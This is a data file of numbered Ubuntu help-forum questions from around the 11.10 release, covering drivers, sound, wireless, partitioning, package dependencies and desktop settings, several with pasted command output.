76078	`` /dev/mapper/cryptswap1 is not ready yet or not present '' error with virtualbox	i just installed ubuntu 11.10 yesterday in virtualbox 4.1.4 and every time i boot ubuntu it says : /dev/mapper/cryptswap1 is not ready yet or not present i 've done a fair bit of googling to try to figure out how to fix this but have come up empty . it appears that the swap is not being mounted , i do n't see it listed when i type the mount command and look at the list of mounted devices . how can i fix this ? edit : apparently it is mounting swap . i just checked dmesg . perhaps the message is not really an error but a timing thing that corrects itself during the boot ? adding 1046524k swap on /dev/mapper/cryptswap1 . priority : -1 extents:1 across:1046524k
76079	what programs does the gnome desktop environment start , after loading metacity ?	i installed ubuntu full version . it 's shipped with the gnome desktop environment . now i want to start some kind of experiment for my netbook , having only a selection of applications for a custom , lightweight desktop environment . actually i 'm running beside openbox a taskbar called `` docky '' . so i 'm using the openbox session selectable with gdm that is being shipped with the installation of the openbox ubuntu package . i start openbox with a autostart.sh looking like this : nautilus -- no-default-window & docky -- nvidia the bad thing is , everything looks quite ugly . it looks like , i need to start some additional programs of the gnome package to have everything back beautiful . i do not need the gnome-panel and not the new taskbar gnome has on the left , but i guess there will be a gnome application that is responsible for loading all libs and themes . can anybody tell me these programs , i need also to load with my autostart.sh to get back the beauty of gnome forms and buttons ? to make clear what i mean : this screenshot is my openbox-session this is my standard ubuntu-session look at both screenshots and read it 's explanation . you will see what i mean . thanks .
76081	brightness not working after installing nvidia driver	i recently installed ubuntu 11.10 on my mac book pro 7,1 . i installed the nvidia driver ( 285 ) . the brightness keys are working ( f1 and f2 ) and i get the box showing the brightness but it does nothing . i can change the brightness in the nvidia x server settings application . how can i get the brightness working without uninstalling the driver ? thanks in advance .
76082	how do i move to a new tab in gedit using the keyboard ?	if i have multiple tabs open , how do i move from one to another ? ( ubuntu 11.10 ; gedit 3.2.1 )
76084	gnome-terminal scrolling behavior not affected by change in gtk3 source code	i needed to change the mouse wheel scroll rate in gtk applications . i downloaded and modified gtk3 source code . i recompiled it . it did the trick for gedit and nautilus . but did not do it for gnome-terminal even though it is a gtk3 application . i changed the lines starting with delta= in the if-else clause . just changed the numbers to weird ones so that i can see the change if there is any . here are the change i made to gtk/gtkrange.c : /** * _gtk_range_get_wheel_delta : * @ range : a # gtkrange * @ direction : a # gdkscrolldirection * * returns a good step value for the mouse wheel . * * return value : a good step value for the mouse wheel . * * since : 2.4 **/ gdouble _gtk_range_get_wheel_delta ( gtkrange *range , gdkscrolldirection direction ) { gtkrangeprivate *priv = range- > priv ; gtkadjustment *adjustment = priv- > adjustment ; gdouble delta ; if ( gtk_is_scrollbar ( range ) ) **delta = pow ( gtk_adjustment_get_page_size ( adjustment ) , 1.0 / 94.0 ) ; ** else **delta = gtk_adjustment_get_step_increment ( adjustment ) * 400 ; ** if ( direction == gdk_scroll_up || direction == gdk_scroll_left ) delta = - delta ; if ( priv- > inverted ) delta = - delta ; return delta ; }
76092	can not resize external 500 gb hdd	im trying to rezize my external 500gb portable hdd but i cant ... i get the follwing in gparted gparted 0.8.1 -- enable-libparted-dmraid libparted 2.3 shrink /dev/sdb1 from 465.73 gib to 444.31 gib 00:00:40 ( error ) calibrate /dev/sdb1 00:00:00 ( success ) path : /dev/sdb1 start : 63 end : 976707583 size : 976707521 ( 465.73 gib ) check file system on /dev/sdb1 for errors and ( if possible ) fix them 00:00:10 ( success ) ntfsresize -p -i -f -v /dev/sdb1 ntfsresize v2011.4.12ar.4 ( libntfs-3g ) device name : /dev/sdb1 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 500074246656 bytes ( 500075 mb ) current device size : 500074250752 bytes ( 500075 mb ) checking for bad sectors ... checking filesystem consistency ... accounting clusters ... space in use : 405632 mb ( 81.1 % ) collecting resizing constraints ... estimating smallest shrunken size supported ... file feature last used at by inode $ mft : 475063 mb 0 multi-record : 494172 mb 30165 $ mftmirr : 250037 mb 1 sparse : 454633 mb 35 ordinary : 500067 mb 153160 you might resize at 405631090688 bytes or 405632 mb ( freeing 94443 mb ) . please make a test run using both the -n and -s options before real resizing ! shrink file system 00:00:20 ( error ) run simulation 00:00:10 ( success ) ntfsresize -p -- force /dev/sdb1 -s 477071639039 -- no-action ntfsresize v2011.4.12ar.4 ( libntfs-3g ) device name : /dev/sdb1 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 500074246656 bytes ( 500075 mb ) current device size : 500074250752 bytes ( 500075 mb ) new volume size : 477071634944 bytes ( 477072 mb ) checking filesystem consistency ... accounting clusters ... space in use : 405632 mb ( 81.1 % ) collecting resizing constraints ... needed relocations : 92761 ( 380 mb ) schedule chkdsk for ntfs consistency check at windows boot time ... resetting $ logfile ... ( this might take a while ) relocating needed data ... updating $ badclust file ... updating $ bitmap file ... updating boot record ... the read-only test run ended successfully . real resize 00:00:10 ( error ) ntfsresize -p -- force /dev/sdb1 -s 477071639039 ntfsresize v2011.4.12ar.4 ( libntfs-3g ) device name : /dev/sdb1 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 500074246656 bytes ( 500075 mb ) current device size : 500074250752 bytes ( 500075 mb ) new volume size : 477071634944 bytes ( 477072 mb ) checking filesystem consistency ... accounting clusters ... space in use : 405632 mb ( 81.1 % ) collecting resizing constraints ... needed relocations : 92761 ( 380 mb ) warning : every sanity check passed and only the dangerous operations left . make sure that important data has been backed up ! power outage or computer crash may result major data loss ! are you sure you want to proceed ( y/ [ n ] ) ? ok quitting . no changes have been made to your ntfs volume . check file system on /dev/sdb1 for errors and ( if possible ) fix them 00:00:09 ( success ) ntfsresize -p -i -f -v /dev/sdb1 ntfsresize v2011.4.12ar.4 ( libntfs-3g ) device name : /dev/sdb1 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 500074246656 bytes ( 500075 mb ) current device size : 500074250752 bytes ( 500075 mb ) checking for bad sectors ... checking filesystem consistency ... accounting clusters ... space in use : 405632 mb ( 81.1 % ) collecting resizing constraints ... estimating smallest shrunken size supported ... file feature last used at by inode $ mft : 475063 mb 0 multi-record : 494172 mb 30165 $ mftmirr : 250037 mb 1 sparse : 454633 mb 35 ordinary : 500067 mb 153160 you might resize at 405631090688 bytes or 405632 mb ( freeing 94443 mb ) . please make a test run using both the -n and -s options before real resizing ! grow file system to fill the partition 00:00:01 ( success ) run simulation 00:00:01 ( success ) ntfsresize -p -- force /dev/sdb1 -- no-action ntfsresize v2011.4.12ar.4 ( libntfs-3g ) device name : /dev/sdb1 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 500074246656 bytes ( 500075 mb ) current device size : 500074250752 bytes ( 500075 mb ) new volume size : 500074246656 bytes ( 500075 mb ) nothing to do : ntfs volume size is already ok. real resize 00:00:00 ( success ) ntfsresize -p -- force /dev/sdb1 ntfsresize v2011.4.12ar.4 ( libntfs-3g ) device name : /dev/sdb1 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 500074246656 bytes ( 500075 mb ) current device size : 500074250752 bytes ( 500075 mb ) new volume size : 500074246656 bytes ( 500075 mb ) nothing to do : ntfs volume size is already ok. ======================================== html report here
76093	change jdownloader icon of the launcher	this is what i see in the launcher when i open jdownloader i do n't want to create a launcher that always stay in the dashboard , i only want see the apropiated icon when open jd .
76095	what is the use of /boot ( lvm based ) in partitioning ?	as separate /home partition helps in easy reinstallation/upgrade . does having /boot help while dualbooting with windows ? i mean is it useful for normal desktop/notebook users or it is advanced technique that need to be deployed in servers ?
76104	do n't have sound anymore after upgrade	i just upgraded my ubuntu 11.04 to 11.10 and now i do n't have sound anymore . also i tried this but unfortunately was unsuccessful . any idea ? i have a `` via `` sound card , p7h55 main board , intel 870 ( core i7 ) processor . here is my lspci -nn | grep audio output : 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 ) 01:00.1 audio device [ 0403 ] : nvidia corporation high definition audio controller [ 10de:0be4 ] ( rev a1 )
76105	an application that resembles lion 's save windows when logging out	i have installed ubuntu 12.04 in a virtual box , and i 'm wondering if there is an application ( or package ) that resembles lion 's automatically-open-everything-up-when-you-logged-out
76107	thinkpad t520 slow wifi	lately my ubuntu wifi is really slow . i upgraded to 11.10 but i already was experiencing slow wifi in 11.04. wlan0 ieee 802.11abgn essid : '' thename '' mode : managed frequency:2.412 ghz access point : 00:1e : e5:64 : af:75 bit rate=135 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-30 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:569 invalid misc:45 missed beacon:0 after googling i also added the following # disable ipv6 net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 to the etc/sysctl.conf file and restarted my system but it 's still slow . i found a command to show all the specs of my pc and pasted it here : http : //pastebin.com/jryhzuyj if i need to provide additional information please let me know .
76110	unity windows maximisation ghost image	i think i have a bug in unity . sometimes i move the mouse over the screen without doing something and it seems that unity want to maximise a ghost window on the left of the screen or on the right . look at the screen copy here you 'll understand what i mean : what is the cause of this - should i file a bug report ?
76111	how do i install a 32-bit java runtime on an amd64 server with multiarch ?	i 'm a long time ubuntu user , but i have n't been following the community for the last several versions . i just did fresh default minimal amd64 install of oneiric and i need a 32-bit jre for a particular application . i last did this on 10.10 , so i am not familiar with the multiarch stuff . instead of installing ia32-libs , i read a bit and tried : aptitude install default-jre-headless : i386 but that just got me : the following new packages will be installed : default-jre-headless { b } openjdk-6-jre-headless { ab } the following packages are recommended but will not be installed : icedtea-6-jre-cacao icedtea-6-jre-jamvm 0 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 27.3 mb of archives . after unpacking 82.1 mb will be used . the following packages have unmet dependencies : default-jre-headless : depends : java-common which is a virtual package . openjdk-6-jre-headless : depends : openjdk-6-jre-lib ( > = 6b23~pre10-0ubuntu5 ) which is a virtual package . depends : ca-certificates-java which is a virtual package . depends : tzdata-java which is a virtual package . depends : java-common ( > = 0.28 ) which is a virtual package . depends : libcups2 but it is not going to be installed . depends : liblcms1 but it is not going to be installed . depends : libjpeg62 but it is not going to be installed . depends : libnss3-1d ( > = 3.12.9+ckbi-1.82-0ubuntu4 ) but it is not going to be installed . depends : libc6 ( > = 2.11 ) but it is not going to be installed . depends : libfreetype6 ( > = 2.2.1 ) but it is not going to be installed . depends : libgcc1 ( > = 1:4.1.1 ) but it is not going to be installed . depends : libstdc++6 ( > = 4.1.1 ) but it is not going to be installed . depends : zlib1g ( > = 1:1.1.4 ) but it is not going to be installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) default-jre-headless [ not installed ] 2 ) openjdk-6-jre-headless [ not installed ] accept this solution ? [ y/n/q/ ? ] q is aptitude not installing the 32-bit versions of the dependencies ? what is the right way to do this ? i 'll likely want both a 64-bit and a 32-bit jre if that matters .
76112	gnome shell flickering with ati proprietary drivers	works fine with opensource drivers , but with catalyst flickers everytime you press on activities or the lower right bar . i have 01:00.0 vga compatible controller : ati technologies inc mobility radeon hd 3600 series running fresh ubuntu 11.10 and catalyst 11.10 from ati.com website . any suggestions ? edit : i want to use the proprietary drivers i know that opensource ones work fine .
76118	resume from suspend stopped working after 10.04.3	i have a lenovo ideapad s10-3 and i began with ubuntu 11.04.i have one problem . once i suspended it , it either resumes straight away ( rarely ) , took up to 3 minutes to resume , or never resumed , and i 'd have to cold restart it . i was hoping that an upgrade to 11.10 would fix this , but it did n't . i decided to try installing the 10.04.3 lts ubuntu and much to my surprise , resume from suspend worked fine . so somewhere between 10.04.3 and 11.04 it 's gone wrong . any help would be much appreciated , as i would love to move to ubuntu full time . thanks in advance , ross
76122	issue with wacom bamboo fun pen & touch	i 'm running 11.10 and i 've bought a wacom bamboo fun pen & touch tablet . i 'm very happy with the pen on ubuntu , it 's very responsive and works well for clicking and dragging etc . the issue that i 've got is that when using touch , nothing seems to work as it does elsewhere , for instance trying to click with touch just moves the cursor up about a bit and trying to scroll does n't work but occasionally zooms . any advice ?
76124	wireless connection does not work during boot-up , but connects after login	i have just upgraded from 11.04 to 11.10 , and the wireless connection now fails to come up at boot-up . when i upgraded to 11.04 i had a problem which was resolved by editing networkmanager.conf to add [ ifupdown ] managed=true now when i start my machine it takes forever to boot up , as it waits for network configuration , and then says it will wait for another 60 seconds . finally , it gives up and boots without network connection . but once i login the network connection comes up fine . how can i make it do whatever it does after login during the boot sequence instead ?
76125	problems with installation on xubuntu 11.10 libreoffice	good afternoon , i have a problem when installing xubuntu libreoffice in 11.10 . i open the console and add the ppa and all goes well , the problem arises when i give the order to installation . san-san @ lenovo : ~ $ sudo apt-get install libreoffice reading package lists ... done building dependency tree reading state information ... done failed to install some packages . this may mean that you have requested an impossible situation or if you are using the distribution unstable , that some required packages have not been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.4.4 ~ rc1-0ubuntu1 ~ ppa1 ) but it will not install depends on : libreoffice-writer but it will not install depends on : libreoffice-calc but it will not install depends on : libreoffice-impress but it will not install depends on : libreoffice-draw but it will not install depends on : libreoffice-math but it will not install depends on : libreoffice-base but it will not install depends on : libreoffice-report-builder-bin but it will not install depends on : libreoffice-filter-mobiledev but it will not install depends on : libreoffice-java-common ( > = 1:3.4.4 ~ rc1 ~ ) but it will not install e : could not fix the problems , he has held broken packages .
76128	compiling gtk2 from source	i download and try to compile the source code for gtk2 : sudo apt-get build-dep libgtk2.0-0 sudo apt-get source libgtk2.0-0 cd gtk+2.0-2.24.6/ ./configure -- prefix=/usr make and i get an error : in file included from gtkquery.c:26:0 : gtkquery.h:31:2 : error : # error `` gtkfilechooserprivate.h is not supported api for general use '' interestingly , i can compile gtk3 with no problems at all with the same steps above . i am using oneiric . if i try debuild , i get thousands of dpkg-source : error : can not represent change to gtk+2.0-2.24.6/something/something : binary file contents changed
76134	resized windows partition in windows , and got to grub rescue commandline instead of grub when rebooting	i dual boot windows 7 and ubuntu 11.10 . i ran out of space in my linux partition , so i hopped over to the windows partition after unsuccessfully resizing the linux partition with gparted . i was using easeus partition manager , and i resized the windows 7 partition . i selected the reboot after changes done option . instead of seeing the regular purple grub menu , i get the grub rescue screen . i 'd much appreciate it if someone could help me .
76136	xscreensaver daemon not set to zero	my problem is that everytime i start ubuntu the monitor goes into stand by . but if i go and choose a screen saver ( my screensaver is starfish ) it says xscreensaver daemon is not set to zero would you like to set it to zero . i hit yes and the problem is fixed . how can i keep this a permanent setting so that i do n't have to keep going to screensaver and changing it ? if it helps my computer is a dell dimension 2350 , 2.4 ghz cpu 2gb of ram and an ati radion x1300 graphics card . 13.9 gb hard drive with ubuntu 11.10
76140	videos in totem kills x server	using oneiric , up-to-date . 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) with the sis driver available in the repositories my videos and movies play smoothly , but i have a desktop resolution of 1024x768 only . with the driver in https : //github.com/hellnest/xf86-video-sismedia-0.9.1 i have a desktop resolution at 1280x800 , but if i try to play any video , the x server is killed and return to the login screen . how can i correct this behaviour ?
76143	blender 2.5 render will not export sound	i have tried several formats , but my blender animation render will not have sound . in blender , it plays fine when i press the play button , but there is no sound in the render . can someone help me with this ? thanks ! in response to devius : according to the terminal , ffmpeg was not installed . i installed it . now should it work ? it takes a long time to render and i do n't want to start it unless i know it 's going to work . update : after installing ffmpeg and restarting , there was still no sound on render . i took the exported file without audio and combined it with the audio track in openshot . good workaround , problem still not fixed . i am marking explorer ' s answer as the answer , even though for me it still does n't work .
76146	how to enable nautilus advanced permissions in configuration editor ?	i cant access show_advanced_permissions key on conf . editor . when open conf . editor on ubuntu 11.10 apps- > nautilus- > preferences only contains 5 key and show_advanced_permissions and a lot of key is missing , how to solve this problem ( if this thing is a problem ) sory my english .
76151	i ca n't find ./usr/bin/wine executable after i installed it	i 've been trying to install microsoft office 2007 and seem easy using wine but when i install wine i just ca n't run it , i tried to install wine 1.2 and 1.3 by terminal and by the center . in the menu of apps its the wine icon of winetricks and wine configure but they do n't do anything . i tried to look for the folder in my personal folder , i already know it 's a hidden folder and when i press ctrl+h appear other folders but .wine when i apply the command winecfg in terminal appears this : carlos @ carlos-acer : ~ $ winecfg exec : 29 : /usr/bin/wine : not found i hope you can help me . i 'm a little new ps : sorry for my english , i 'm learning and thanks for the time to read : )
76154	argus camera dc-1512e will not transfer photos	i ca n't transfer photos from this camera . it will not show up a drive . shotwell does not acknowledge it 's existence . lsusb reports the camera as `` primax elecrtonics '' . help ?
76163	how do i install the runtime version of vim ?	how do i go about installing the runtime version of vim ?
76168	starcraft 2 : blizzard downloader has encountered a problem	not sure if anyone else has had this problem , but the downloader got to 30 % and crashed . it seems now to crash every time it checks itself back to 30 % . program freezes and i have to terminate it . anyone have any solutions ? i suppose the work around for this is to just torrent the dvd 's instead . but it would be really nice to get this working . i installed the vcrun2005 and 2008 i am winearch=win64 windows xp
76179	how to show spreedx client applicationindicator ?	for my job i require the use of the spreedx client which allows me to share my desktop when using the spreed web conferencing environment ( www.spreed.com ) . in pre-unity ubuntu versions , this application 's indicator worked perfectly . however , it does n't play nice with unity ( it does n't show ) , not even when adding the magic gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' . so i 'm not entirely sure where to go from here , but i did find the ( presumable ) source of the client : https : //github.com/andreashe/mygitsite/tree/master/spreedx . i 'm assuming that for an ( experienced ? ) python developer , it should n't be hard to fix the app by using the guidelines which i found here . unfortunately , i 'm no python developer , let alone an experienced one : - ( but perhaps there are other solutions which i did not think about ? of course , i will contact spreed and ask them to fix this , but if they wo n't ( or it takes them forever ) i would love to have some more options ...
76197	mp3 player : `` this does not look like a partition table ''	first of all , i 'm not sure if this belongs on askubuntu . i 'm sorry if it does n't . when i ran sudo fdisk -l i get some messages that worry me . this is the output : > robin @ robin-latitude-d620 : ~ $ sudo fdisk -l > > medium /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 > sectors/track , 19457 cilinders unit = cilinders from 16065 * 512 = > 8225280 bytes sector size ( logic/physical ) : 512 bytes / 512 bytes > in-/output size ( minimal/optimal ) : 512 bytes / 512 bytes > medium-id : 0xf514f514 > > device startup begin end blocks id system > /dev/sda1 * 1 44 346112 83 linux partition > 1 does n't end on cilinder border . /dev/sda2 460 > 19458 152602625 5 extended /dev/sda3 44 > 459 3339264 82 linux swap partition 3 does't end on > a cilinder border . /dev/sda5 460 16272 127016960 > 7 hpfs/ntfs /dev/sda6 16273 17770 12024832 83 > linux /dev/sda7 17770 19458 13558784 83 linux > > partition table items are n't shown in disk order > > medium /dev/sdb : 8140 mb , 8140095488 bytes 251 heads , 62 > sectors/track , 1021 cilinders unit = cilinders from 15562 * 512 = > 7967744 bytes sector size ( logic/physical ) : 512 bytes / 512 bytes > in-/output size ( minimal/optimal ) : 512 bytes / 512 bytes > medium-id : 0x6f20736b > > this does n't look like a partition table . you probably chose a > wrong device . > > device startup begin end blocks id system > /dev/sdb1 ? 50003 123355 570754815+ 72 [ unknown ] > partition 1 has different physic/logic starting points > ( not-linux ? ) : > physic= ( 357 , 116 , 40 ) logic= ( 50002 , 77 , 11 ) has different physic/logic starting points : > physic= ( 357 , 32 , 45 ) logic= ( 123354 , 170 , 51 ) partition 1 does n't end on a cilinder border . /dev/sdb2 ? 10840 135248 > 968014120 65 novell netware 386 partitie 2 has different > physic/logic starting points ( not-linux ? ) : > physic= ( 288 , 115 , 43 ) logic= ( 10839 , 209 , 47 ) partitie 2 has different > physic/logic ending points : > physic= ( 367 , 114 , 50 ) logic= ( 135247 , 63 , 42 ) partitie 2 does n't end on a cilinder border . /dev/sdb3 ? 120157 244565 > 968014096 79 [ unknown ] partitie 3 has different > physic/logic starting points ( not-linux ? ) : > physic= ( 366 , 32 , 33 ) logic= ( 120156 , 222 , 30 ) partitie 3 has different physic/logic ending points : > physic= ( 357 , 32 , 43 ) logic= ( 244564 , 75 , 39 ) partitie 3 does n't end on a cilinder border . /dev/sdb4 ? 185432 185435 > 27749+ d [ unknown ] partitie 4 has different physic/logic > starting points ( not-linux ? ) : > physic= ( 372 , 97 , 50 ) logic= ( 185431 , 63 , 25 ) partitie 4 has different physic/logic ending points : > physic= ( 0 , 10 , 0 ) logic= ( 185434 , 205 , 33 ) partitie 4 does n't end on a cilinder border . > > partition table items are n't shown in drive order . > > medium /dev/sdc : 3951 mb , 3951034368 bytes 90 heads , 57 > sectors/tracks , 1504 cilinders unit = cilinders from 5130 * 512 = > 2626560 bytes sector size ( logic/physic ) : 512 bytes / 512 bytes > in-/output size ( minimal/optimal ) : 512 bytes / 512 bytes > medium-id : 0x0008fe1a > > device startup begin end blocks id system > /dev/sdc1 1 1505 3857408 b w95 fat32 i translated it to english fairly well i think , regarding that i do n't fully understand what this is about . but here 's the original one ( in dutch ) as well : > robin @ robin-latitude-d620 : ~ $ sudo fdisk -l > > schijf /dev/sda : 160.0 gb , 160041885696 bytes 255 koppen , 63 > sectoren/spoor , 19457 cilinders eenheid = cilinders van 16065 * 512 = > 8225280 bytes sectorgrootte ( logischl/fysiek ) : 512 bytes / 512 bytes > in-/uitvoergrootte ( minimaal/optimaal ) : 512 bytes / 512 bytes > schijf-id : 0xf514f514 > > apparaat opstart begin einde blokken id systeem > /dev/sda1 * 1 44 346112 83 linux partitie > 1 eindigt niet op een cilindergrens . /dev/sda2 460 > 19458 152602625 5 uitgebreid /dev/sda3 44 > 459 3339264 82 linux wisselgeheugen partitie 3 eindigt niet op > een cilindergrens . /dev/sda5 460 16272 127016960 > 7 hpfs/ntfs /dev/sda6 16273 17770 12024832 83 > linux /dev/sda7 17770 19458 13558784 83 linux > > partitietabel-items liggen niet in schijfvolgorde . > > schijf /dev/sdb : 8140 mb , 8140095488 bytes 251 koppen , 62 > sectoren/spoor , 1021 cilinders eenheid = cilinders van 15562 * 512 = > 7967744 bytes sectorgrootte ( logischl/fysiek ) : 512 bytes / 512 bytes > in-/uitvoergrootte ( minimaal/optimaal ) : 512 bytes / 512 bytes > schijf-id : 0x6f20736b > > dit lijkt niet op een partitietabel . waarschijnlijk koos u een > verkeerd apparaat . > > apparaat opstart begin einde blokken id systeem > /dev/sdb1 ? 50003 123355 570754815+ 72 [ onbekend ] > partitie 1 heeft verschillende fysieke/logische beginpunten > ( niet-linux ? ) : > fysiek= ( 357 , 116 , 40 ) logisch= ( 50002 , 77 , 11 ) partitie 1 heeft verschillende fysieke/logische eindpunten : > fysiek= ( 357 , 32 , 45 ) logisch= ( 123354 , 170 , 51 ) partitie 1 eindigt niet op een cilindergrens . /dev/sdb2 ? 10840 135248 > 968014120 65 novell netware 386 partitie 2 heeft verschillende > fysieke/logische beginpunten ( niet-linux ? ) : > fysiek= ( 288 , 115 , 43 ) logisch= ( 10839 , 209 , 47 ) partitie 2 heeft verschillende fysieke/logische eindpunten : > fysiek= ( 367 , 114 , 50 ) logisch= ( 135247 , 63 , 42 ) partitie 2 eindigt niet op een cilindergrens . /dev/sdb3 ? 120157 244565 > 968014096 79 [ onbekend ] partitie 3 heeft verschillende > fysieke/logische beginpunten ( niet-linux ? ) : > fysiek= ( 366 , 32 , 33 ) logisch= ( 120156 , 222 , 30 ) partitie 3 heeft verschillende fysieke/logische eindpunten : > fysiek= ( 357 , 32 , 43 ) logisch= ( 244564 , 75 , 39 ) partitie 3 eindigt niet op een cilindergrens . /dev/sdb4 ? 185432 185435 > 27749+ d [ onbekend ] partitie 4 heeft verschillende fysieke/logische > beginpunten ( niet-linux ? ) : > fysiek= ( 372 , 97 , 50 ) logisch= ( 185431 , 63 , 25 ) partitie 4 heeft verschillende fysieke/logische eindpunten : > fysiek= ( 0 , 10 , 0 ) logisch= ( 185434 , 205 , 33 ) partitie 4 eindigt niet op een cilindergrens . > > partitietabel-items liggen niet in schijfvolgorde . > > schijf /dev/sdc : 3951 mb , 3951034368 bytes 90 koppen , 57 > sectoren/spoor , 1504 cilinders eenheid = cilinders van 5130 * 512 = > 2626560 bytes sectorgrootte ( logischl/fysiek ) : 512 bytes / 512 bytes > in-/uitvoergrootte ( minimaal/optimaal ) : 512 bytes / 512 bytes > schijf-id : 0x0008fe1a > > apparaat opstart begin einde blokken id systeem > /dev/sdc1 1 1505 3857408 b w95 fat32 sda is my local hard drive , sdb is my mp3 player , sdc is my mp3 player 's microsd card . should i start to worry ? what precautions should i take ? is the issue with the swap partition on sda anything to worry about ?
76202	how to burn subtitle to avi ?	i have tried several suggested methods and commands , mostly using mencoder with commands like this : sudo mencoder movie.avi \ -ovc lavc -oac mp3lame \ -sub movie.srt \ -font `` /usr/share/fonts/truetype/msttcorefonts/tahoma.ttf '' -subfont-autoscale 2 \ -o movieplussub.avi the problem is that the subtitle is in non-latin fonts ( but still utf8 ) however they end up being displayed on the avi as ' ? ? ? ? ? ? ? ' .
76203	ubuntu 11.10 is slow	it 's much slower than 11.04 . my laptop is new and quite powerful , so it 's not the issue . everything just loads slower ( music , browser , files , everything ! ) . why is that ? what should i do ?
76205	no multichannel audio over digital coax ( s/pdif )	new install of 11.10 on an older rig ( asus p4pe mb ) that has the built-in ac'97 sound chipset and in the system settings > sound there is only a choice for 2-channel digital sound . i plan on using the system as a media server and need to find a way to enable the ability to send dolby digital or dts bitstream to a surround receiver . i do get 2 channel sound when setting the option to 'analog duplex ' or 'analog stereo output ' . when i set the option to 'digital stereo ( iec958 ) output ' i get 2-channel audio that is faster and higher in pitch . aplay -l list of playback hardware devices card 0 : i82801dbich4 [ intel 82801db-ich4 ] , device 0 : intel ich [ intel 82801db-ich4 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : i82801dbich4 [ intel 82801db-ich4 ] , device 4 : intel ich - iec958 [ intel 82801db-ich4 - iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lspci | grep audio 00:1f.5 multimedia audio controller : intel corporation 82801db/dbl/dbm ( ich4/ich4- l/ich4-m ) ac'97 audio controller ( rev 02 ) i already went into alsamixer and made sure s/pdif level was up , as well as the surrounds and lfe . i am new to linux/ubuntu but willing to try anything , so let me have it . hours of searches yields solutions that either do n't apply my unique problem , or to 11.10 or do n't apply to the ubuntu distro altogether . i feel like i 'm chasing my tail here .
76207	wireless option gone from network center	i 've got a broadcom bcm4036 wireless card , as follows : 01:09.0 network controller : broadcom corporation bcm4306 802.11b/g wireless lan controller ( rev 02 ) subsystem : linksys device 0013 flags : bus master , fast devsel , latency 32 , irq 5 memory at fdefc000 ( 32-bit , non-prefetchable ) [ size=8k ] capabilities : [ 40 ] power management version 2 kernel modules : ssb i 'm running ubuntu 11.10 . my wireless card has n't worked so far ( i installed ubuntu this afternoon ) , and i 've tried various things to make it work ( including the answer to this question , and this help page ) , and it seems that one of them made the wireless option disappear . there 's nothing in my additional drivers to enable ( other questions mention needing to enable broadcom sta wireless driver , but i do n't see that option ) . how do i get it back ? more importantly , how do i get my wireless card working ? do let me know if there 's any information you need .
76212	is it possible to set the default lens in unity ?	i am currently using unity , and finding it on the whole very good . however , the dash is not particularly useful to me , and i would like to set the default action on pressing the bfb ( is it still called that ? ) to opening the docs lens , as that is generally the most useful one to me .
76215	how do i set the panel whitelist back to the default ?	i set this option : gsettings set desktop.unity.panel systray-whitelist `` [ 'all ' ] '' and now i am having all sorts of weird problems with my panel like double icons and stuff , how do i reset this setting to the default setting ?
76222	are the nvidia drivers not performing as they should ?	i have a dream ... and in that dream i am running full hd videos in xbmc on my sapphire edge hd2 media pc . it is based on the ion 2 chip . i installed ubuntu on it and in ubuntu i installed xbmc . i chose the ârecomendedâ driver in the additional drivers window of ubuntu . after this i played around with xbmc testing it out . immediately i found the performance unsatisfactory . playing 720p and 1080p video files caused horizontal lagging stripes , for lack of a better word , in the picture . now i started reading up on installing the newest drivers form nvidia . i found this explanation : http : //www.ubuntugeek.com substituting gdm with lightdm it worked like a charm . after activating the new drivers i found a pleasing performance boost to the video rendering . gone were all the horizontal lagging stripes and the first few films i saw was very pretty . however , a few of the highest resolution films still seemed to be problematic . in scenes of the movies where most of the image consisted of moving objects there where serious issues . its not stripes or lag but simply a drop in frame-rate . ( just like playing a game with too low fps ) so , i started reading more on nvidia drivers for linux and found some mention that the above method of installing the nvidia drivers was not `` recomended '' . so i purged and removed all things nvidia from my system and ran this : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current i belive i also tried some other repositories as well . i even did a clean install of ubuntu trying each method with a `` fresh '' start . still the same fps problem . now , at this point i am thinking it is a hardware issue . maybe the hardware in this little device just cant handle the films with the best quality . but here is the kicker : i installed windows 7 and loaded it up just to see what happened . using the exact same video file in windows on windows mediaplayer it runs super smooth , no problem at all . so , obviously it is not a hardware performance issue . i 'd hate to have to use windows instead of ubuntu to run on my media-pc . anyone want to help , suggestions ? system info : ubuntu 11.10 , xbmc dharma 10.0 , nvidia-linux-x86-285.05.09 , sapphire edge hd2 mini pc . ( specs )
76228	video output corruption on a dell inspiron 1545 with gm45 graphics	i 'm getting this on a dell inspiron 1545 / gm45 graphics . any ideas ?
76229	can i remove the brightness tooltip ?	i do n't need the tooltip because changing the brightness gives you visual feedback on its own . more importantly , the tooltip really slows down my computer - if video is playing the tooltip causes it to stutter , unlike the volume change tooltip , which does n't slow down the computer .
76239	downloading a file from a remove server	how can i download a file or directory that is on a remove server ? ( note : there is no ftp setup on the server , is it possible to do this w/o having to install anything on the server ? )
76247	replicate a system as is	how do i repliacate a system as is . i have installed ubuntu from the minimal iso ... i have kept it to minimum now i m using uck to customise a live cd is there anyway i can replicate my installed system as is ? i.e . install apps that i have install and remove apps that i have not installed/removed i tried using synaptics and saving the marking full state way and when i read it when customizing , it doesnt remove the apps that i have removed it just reads installs more apps , it doesnt remove
